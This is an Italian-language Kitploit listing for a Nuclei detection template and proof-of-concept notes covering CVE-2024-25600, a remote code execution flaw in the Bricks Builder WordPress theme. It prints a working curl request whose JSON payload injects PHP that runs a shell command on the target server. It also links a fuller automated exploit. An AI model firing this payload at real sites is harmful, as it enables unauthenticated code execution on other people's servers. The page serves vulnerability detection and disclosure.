Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-25600_Nuclei-Template — Template di Nuclei e informazioni sul POC per CVE-2024-25600 | Kitploit
Strumenti/GitHubGitHub/christbowel/cve-2024-25600_nuclei-template
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubchristbowel/cve-2024-25600_nuclei-template

CVE-2024-25600_Nuclei-Template

Template di Nuclei e informazioni sul POC per CVE-2024-25600

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
3172 anni faRevisionato da Kitploit

CVE-2024-25600_Nuclei-Template

Modello Nuclei e informazioni sul POC per CVE-2024-25600

Descrizione 📝

Il tema Bricks per WordPress è vulnerabile all'esecuzione remota di codice in tutte le versioni fino alla 1.9.6 inclusa. Ciò consente ad attaccanti non autenticati di eseguire codice sul server. Questo template 🛠️ è progettato per rilevare la vulnerabilità CVE-2024-25600 🕳️ presente nel plugin Bricks Builder per WordPress utilizzando nuclei. La vulnerabilità consente l'esecuzione remota di codice non autenticata sui siti web colpiti 💻.

Prova di Concetto (PoC) 📝

Il POC completo (automatico) è disponibile su https://github.com/chocapikk/CVE-2024-25600.

Il PoC di base fornito dalla divulgazione è il seguente:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}'

Sostituisci [HOST] con il sito web target e [NONCE] con il valore nonce recuperato dal sito.

Riferimento 📖

Per maggiori informazioni sulla vulnerabilità CVE-2024-25600, fai riferimento alla divulgazione dettagliata su Snicco.io.

Scarica lo strumento